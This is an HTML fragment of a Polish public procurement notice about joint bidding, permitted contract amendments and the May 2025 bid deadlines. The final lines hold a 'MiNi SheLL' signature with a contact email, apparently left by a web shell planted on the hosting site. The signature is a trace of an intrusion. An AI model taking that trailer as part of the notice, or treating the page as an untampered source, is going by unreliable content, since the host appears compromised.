Pełnomocnictwo należy dołączyć do oferty i powinno ono zawierać<br/>w szczególności wskazanie:<br/>1) postępowania o udzielenie zamówienie publicznego, którego dotyczy;<br/>2) wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>3) ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument ”Oświadczenia o niepodleganiu<br/>wykluczeniu oraz spełnianiu warunków udziału”, o którym mowa w pkt. 9.1 SWZ, składa każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia<br/>te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału<br/>w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> a) Zmiana terminu realizacji umowy - w przypadku wystąpienia okoliczności niezależnych od stron umowy powodujących, że<br/>realizacja inwestycji w umownym terminie stanie się niemożliwa.<br/>b) Zmiana danych teleadresowych - w przypadku zmiany danych kontaktowych i/lub siedziby stron umowy w okresie jej<br/>trwania.<br/>c) Zmiana danych dotyczących rachunku bankowego - w przypadku zmiany banku i/lub nr rachunku bankowego stron<br/>umowy w okresie jej trwania.<br/>d) Zmiana danych dotyczących warunków płatności (np. wprowadzenie płatności zaliczkowej lub częściowej) - w przypadku<br/>wystąpienia okoliczność niezależnych od stron umowy, mających wpływ na realizację przedmiotu zamówienia.<br/>e) Nastąpi wywierająca bezpośredni wpływ na dalsze wykonywanie umowy zmiana obowiązującego prawa powszechnego.<br/>Strony przewidują zmianę umowy zgodnie z 455 ust. 1 pkt 1 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-28 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://e-propublico.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-28 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com